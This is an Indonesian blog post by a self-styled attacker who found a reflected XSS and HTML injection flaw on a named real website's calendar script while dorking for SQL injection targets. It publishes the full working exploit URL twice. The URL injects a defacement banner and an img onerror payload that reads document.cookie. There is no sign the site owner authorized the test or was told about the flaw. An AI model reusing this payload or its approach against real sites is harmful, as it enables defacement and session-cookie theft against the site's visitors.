-
Hai Sobat.
Saya ikal
Disini, saya akan share sesuatu nih
-
Jadi waktu itu saya lagi ngedork sqli, eh nemu web ini ckck, ga vuln terhadap sqli. Yaudah saya test html injection dan coba memasukan payload xss, dan hasilnya berhasil ckck.
Okeh langsung saja
Target : http://www.elmontfd.com
Bug terletak di bagian calendar
Yaps, di path /calendarix/. Disitu ada column search yah, "Pasti bugnya disitu yah bang?" salah ckckc. Jadi bugnya ada di bagian bagian bawah tuh.
Jadi ini memanfaatkan request GET dari url dan otomatis angka atau huruf atau bahkan special char bisa masuk dan muncul di page tersebut.
HTML Injection and Reflected XSS :
http://www.elmontfd.com/calendarix/yearcal.php?op=yearcal&ycyear=2020%3Cbr/%3E%3Ch3%3E1K4lL_*%20|%20DragonXploiter%3C/h3%3E%3Cbr/%3E%3Cimg%20src=x%20onerror=prompt(%27?%27,document.cookie)%3E
http://www.elmontfd.com/calendarix/yearcal.php?op=yearcal&ycyear=2020%3Cbr/%3E%3Ch3%3E1K4lL_*%20|%20DragonXploiter%3C/h3%3E%3Cbr/%3E%3Cimg%20src=x%20onerror=prompt(%27?%27,document.cookie)%3E
Yaps mungkin segini saja
Thanks
See u